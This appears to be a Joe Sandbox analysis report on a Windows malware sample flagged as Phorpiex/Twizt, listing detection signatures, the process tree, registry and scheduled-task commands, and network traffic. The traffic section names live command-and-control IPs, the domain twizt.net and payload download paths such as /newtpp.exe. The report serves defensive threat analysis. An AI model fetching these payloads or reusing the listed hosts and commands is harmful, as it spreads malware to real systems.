Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
LM94OE0VNK.exe

Overview

General Information

Sample name:LM94OE0VNK.exe
renamed because original name is a hash value
Original sample name:8ce09f13942ab5bcb81b175996c8385f.exe
Analysis ID:1564700
MD5:8ce09f13942ab5bcb81b175996c8385f
SHA1:6fa685d66ac5fff4e9d984dc1903c47a1a6b6cbd
SHA256:757bf8be40693456e7cdee5c53416d1cb223da5f7d0b9d55f4aca95f6a57605d
Tags:exeuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Contains functionality to check if Internet connection is working
Contains functionality to detect sleep reduction / modifications
Drops executables to the windows directory (C:\Windows) and starts them
Found evasive API chain (may stop execution after checking mutex)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Machine Learning detection for sample
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found evaded block containing many API calls
Found evasive API chain (may stop execution after accessing registry keys)
Found large amount of non-executed APIs
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry

Classification

Process Tree

  • System is w10x64
  • LM94OE0VNK.exe (PID: 8140 cmdline: "C:\Users\user\Desktop\LM94OE0VNK.exe" MD5: 8CE09F13942AB5BCB81B175996C8385F)
    • 2374323789.exe (PID: 7544 cmdline: C:\Users\user\AppData\Local\Temp\2374323789.exe MD5: 0C883B1D66AFCE606D9830F48D69D74B)
      • sysnldcvmr.exe (PID: 7656 cmdline: C:\Windows\sysnldcvmr.exe MD5: 0C883B1D66AFCE606D9830F48D69D74B)
        • 240016073.exe (PID: 6128 cmdline: C:\Users\user\AppData\Local\Temp\240016073.exe MD5: CB8420E681F68DB1BAD5ED24E7B22114)
          • cmd.exe (PID: 1452 cmdline: "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 3096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • reg.exe (PID: 3208 cmdline: reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
          • cmd.exe (PID: 3452 cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 1200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • schtasks.exe (PID: 6832 cmdline: schtasks /delete /f /tn "Windows Upgrade Manager" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • 2693731851.exe (PID: 1892 cmdline: C:\Users\user\AppData\Local\Temp\2693731851.exe MD5: 0C883B1D66AFCE606D9830F48D69D74B)
  • sysnldcvmr.exe (PID: 7964 cmdline: "C:\Windows\sysnldcvmr.exe" MD5: 0C883B1D66AFCE606D9830F48D69D74B)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Windows\sysnldcvmr.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\2374323789.exe, ProcessId: 7544, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-28T18:18:43.482513+010020440771A Network Trojan was detected192.168.2.105529390.156.160.640500UDP
2024-11-28T18:18:48.533043+010020440771A Network Trojan was detected192.168.2.105529380.191.218.20940500UDP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-28T18:18:30.566440+010028032742Potentially Bad Traffic192.168.2.1049702185.215.113.6680TCP
2024-11-28T18:18:33.724115+010028032742Potentially Bad Traffic192.168.2.1049702185.215.113.6680TCP
2024-11-28T18:18:41.727174+010028032742Potentially Bad Traffic192.168.2.1049703185.215.113.6680TCP
2024-11-28T18:18:44.488388+010028032742Potentially Bad Traffic192.168.2.1049706185.215.113.6680TCP
2024-11-28T18:18:48.794430+010028032742Potentially Bad Traffic192.168.2.104971191.202.233.14180TCP
2024-11-28T18:18:51.034709+010028032742Potentially Bad Traffic192.168.2.1049712185.215.113.6680TCP
2024-11-28T18:18:53.558980+010028032742Potentially Bad Traffic192.168.2.1049713185.215.113.6680TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-28T18:18:28.772817+010028565631A Network Trojan was detected192.168.2.10555311.1.1.153UDP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-28T18:18:33.724115+010028532921Malware Command and Control Activity Detected192.168.2.1049702185.215.113.6680TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-28T18:18:41.727174+010028482951A Network Trojan was detected192.168.2.1049703185.215.113.6680TCP
2024-11-28T18:18:44.488388+010028482951A Network Trojan was detected192.168.2.1049706185.215.113.6680TCP
2024-11-28T18:18:51.034709+010028482951A Network Trojan was detected192.168.2.1049712185.215.113.6680TCP
2024-11-28T18:18:53.558980+010028482951A Network Trojan was detected192.168.2.1049713185.215.113.6680TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for URL or domain
Source: http://91.202.233.141/gonupll9zAvira URL Cloud: Label: malware
Source: http://185.215.113.66/2C:Avira URL Cloud: Label: malware
Source: http://91.202.233.141/gonupAvira URL Cloud: Label: malware
Source: http://185.215.113.66/http://91.202.233.141/12345%s%s%s:Zone.Identifier%userprofile%%windir%%sAvira URL Cloud: Label: malware
Source: http://185.215.113.66/1yAvira URL Cloud: Label: malware
Source: http://185.215.113.66/2IIC:Avira URL Cloud: Label: malware
Source: http://185.215.113.66/1~Avira URL Cloud: Label: malware
Source: http://185.215.113.66/2?Avira URL Cloud: Label: malware
Source: http://91.202.233.141/gonup8Avira URL Cloud: Label: malware
Source: http://91.202.233.141/gonup1Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\2374323789.exeAvira: detection malicious, Label: HEUR/AGEN.1315882
Source: C:\Windows\sysnldcvmr.exeAvira: detection malicious, Label: HEUR/AGEN.1315882
Source: C:\Users\user\AppData\Local\Temp\2693731851.exeAvira: detection malicious, Label: HEUR/AGEN.1315882
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\newtpp[1].exeAvira: detection malicious, Label: HEUR/AGEN.1315882
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\newtpp[1].exeReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\2374323789.exeReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\240016073.exeReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Temp\2693731851.exeReversingLabs: Detection: 75%
Source: C:\Windows\sysnldcvmr.exeReversingLabs: Detection: 75%
Multi AV Scanner detection for submitted file
Source: LM94OE0VNK.exeReversingLabs: Detection: 52%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\2374323789.exeJoe Sandbox ML: detected
Source: C:\Windows\sysnldcvmr.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\240016073.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\2693731851.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\newtpp[1].exeJoe Sandbox ML: detected
Machine Learning detection for sample
Source: LM94OE0VNK.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\2374323789.exeCode function: 3_2_0040BE80 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,3_2_0040BE80
Source: C:\Windows\sysnldcvmr.exeCode function: 4_2_0040BE80 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,4_2_0040BE80
Source: C:\Windows\sysnldcvmr.exeCode function: 7_2_0040BE80 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,7_2_0040BE80
Source: LM94OE0VNK.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\LM94OE0VNK.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9625_none_508ef7e4bcbbe589\MSVCR90.dllJump to behavior
Source: LM94OE0VNK.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\AppData\Local\Temp\2374323789.exeCode function: 3_2_004066B0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,3_2_004066B0
Source: C:\Users\user\AppData\Local\Temp\2374323789.exeCode function: 3_2_00406570 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,3_2_00406570
Source: C:\Windows\sysnldcvmr.exeCode function: 4_2_004066B0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,4_2_004066B0
Source: C:\Windows\sysnldcvmr.exeCode function: 4_2_00406570 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,4_2_00406570
Source: C:\Windows\sysnldcvmr.exeCode function: 7_2_004066B0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,7_2_004066B0
Source: C:\Windows\sysnldcvmr.exeCode function: 7_2_00406570 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,7_2_00406570

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2856563 - Severity 1 - ETPRO MALWARE Phorpiex Domain in DNS Lookup : 192.168.2.10:55531 -> 1.1.1.1:53
Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.10:55293 -> 90.156.160.6:40500
Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.10:49703 -> 185.215.113.66:80
Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.10:49706 -> 185.215.113.66:80
Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.10:55293 -> 80.191.218.209:40500
Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.10:49712 -> 185.215.113.66:80
Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.10:49713 -> 185.215.113.66:80
Source: Network trafficSuricata IDS: 2853292 - Severity 1 - ETPRO MALWARE Win32/Phorpiex Twizt Variant CnC Checkin : 192.168.2.10:49702 -> 185.215.113.66:80
Contains functionality to check if Internet connection is working
Source: C:\Users\user\AppData\Local\Temp\2374323789.exeCode function: 3_2_0040AA80 htons,socket,connect,getsockname, www.update.microsoft.com3_2_0040AA80
Source: C:\Windows\sysnldcvmr.exeCode function: 4_2_0040AA80 htons,socket,connect,getsockname, www.update.microsoft.com4_2_0040AA80
Source: C:\Windows\sysnldcvmr.exeCode function: 7_2_0040AA80 htons,socket,connect,getsockname, www.update.microsoft.com7_2_0040AA80
Source: global trafficTCP traffic: 192.168.2.10:49708 -> 178.22.172.2:40500
Source: global trafficTCP traffic: 192.168.2.10:49714 -> 217.30.162.161:40500
Source: global trafficUDP traffic: 192.168.2.10:55293 -> 90.156.160.6:40500
Source: global trafficUDP traffic: 192.168.2.10:55293 -> 80.191.218.209:40500
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 28 Nov 2024 17:18:30 GMTContent-Type: application/octet-streamContent-Length: 80896Last-Modified: Tue, 12 Nov 2024 22:30:51 GMTConnection: keep-aliveETag: "6733d71b-13c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6d bb 70 6a 29 da 1e 39 29 da 1e 39 29 da 1e 39 20 a2 94 39 2e da 1e 39 51 a8 1f 38 2b da 1e 39 ea d5 43 39 2b da 1e 39 ea d5 41 39 28 da 1e 39 ea d5 11 39 2b da 1e 39 0e 1c 73 39 2d da 1e 39 29 da 1f 39 95 da 1e 39 0e 1c 65 39 3c da 1e 39 20 a2 9d 39 2d da 1e 39 20 a2 9a 39 35 da 1e 39 20 a2 8f 39 28 da 1e 39 52 69 63 68 29 da 1e 39 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 cd d6 33 67 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 e4 00 00 00 64 00 00 00 00 00 00 90 75 00 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 70 01 00 00 04 00 00 00 00 00 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 24 01 00 04 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 10 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f2 e2 00 00 00 10 00 00 00 e4 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 fa 33 00 00 00 00 01 00 00 34 00 00 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 28 2f 00 00 00 40 01 00 00 20 00 00 00 1c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: Joe Sandbox ViewIP Address: 185.215.113.66 185.215.113.66
Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox ViewASN Name: MASTERHOST-ASMoscowRussiaRU MASTERHOST-ASMoscowRussiaRU
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49703 -> 185.215.113.66:80
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49706 -> 185.215.113.66:80
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49712 -> 185.215.113.66:80
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49711 -> 91.202.233.141:80
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49713 -> 185.215.113.66:80
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49702 -> 185.215.113.66:80
Source: global trafficHTTP traffic detected: GET /newtpp.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Host: twizt.net
Source: global trafficHTTP traffic detected: GET /peinstall.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: twizt.net
Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global trafficHTTP traffic detected: GET /gonup HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: unknownTCP traffic detected without corresponding DNS query: 178.22.172.2
Source: unknownTCP traffic detected without corresponding DNS query: 178.22.172.2
Source: unknownTCP traffic detected without corresponding DNS query: 178.22.172.2
Source: unknownTCP traffic detected without corresponding DNS query: 178.22.172.2
Source: unknownTCP traffic detected without corresponding DNS query: 178.22.172.2
Source: unknownTCP traffic detected without corresponding DNS query: 178.22.172.2
Source: unknownTCP traffic detected without corresponding DNS query: 178.22.172.2
Source: unknownTCP traffic detected without corresponding DNS query: 178.22.172.2
Source: unknownTCP traffic detected without corresponding DNS query: 178.22.172.2
Source: unknownTCP traffic detected without corresponding DNS query: 178.22.172.2
Source: unknownTCP traffic detected without corresponding DNS query: 178.22.172.2
Source: unknownTCP traffic detected without corresponding DNS query: 178.22.172.2
Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknownTCP traffic detected without corresponding DNS query: 178.22.172.2
Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknownTCP traffic detected without corresponding DNS query: 178.22.172.2
Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
Source: C:\Users\user\Desktop\LM94OE0VNK.exeCode function: 0_2_009C1120 GetTickCount,srand,ExpandEnvironmentStringsW,rand,rand,wsprintfW,wsprintfW,InternetOpenW,InternetOpenUrlW,CreateFileW,InternetReadFile,InternetReadFile,WriteFile,WriteFile,InternetReadFile,CloseHandle,wsprintfW,DeleteFileW,CloseHandle,wsprintfW,InternetCloseHandle,InternetCloseHandle,Sleep,Sleep,rand,Sleep,rand,rand,wsprintfW,URLDownloadToFileW,wsprintfW,DeleteFileW,0_2_009C1120
Source: global trafficHTTP traffic detected: GET /newtpp.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Host: twizt.net
Source: global trafficHTTP traffic detected: GET /peinstall.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: twizt.net
Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global trafficHTTP traffic detected: GET /gonup HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global trafficDNS traffic detected: DNS query: twizt.net
Source: 2374323789.exe, 00000003.00000003.1479100404.0000000000708000.00000004.00000020.00020000.00000000.sdmp, 2374323789.exe, 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 2374323789.exe, 00000003.00000000.1448282216.0000000000410000.00000002.00000001.01000000.00000006.sdmp, sysnldcvmr.exe, 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysnldcvmr.exe, 00000004.00000003.1630375617.0000000004561000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000004.00000000.1479054987.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysnldcvmr.exe, 00000007.00000000.1604584854.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysnldcvmr.exe, 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 2693731851.exe, 0000000E.00000002.1683491729.0000000000410000.00000002.00000001.01000000.0000000A.sdmp, 2693731851.exe, 0000000E.00000000.1651816299.0000000000410000.00000002.00000001.01000000.0000000A.sdmp, 2374323789.exe.0.dr, sysnldcvmr.exe.3.dr, 2693731851.exe.4.dr, newtpp[1].exe.0.drString found in binary or memory: http://185.215.113.66/
Source: sysnldcvmr.exe, 00000004.00000002.1688257376.00000000006E9000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000004.00000002.1688257376.000000000069E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/1
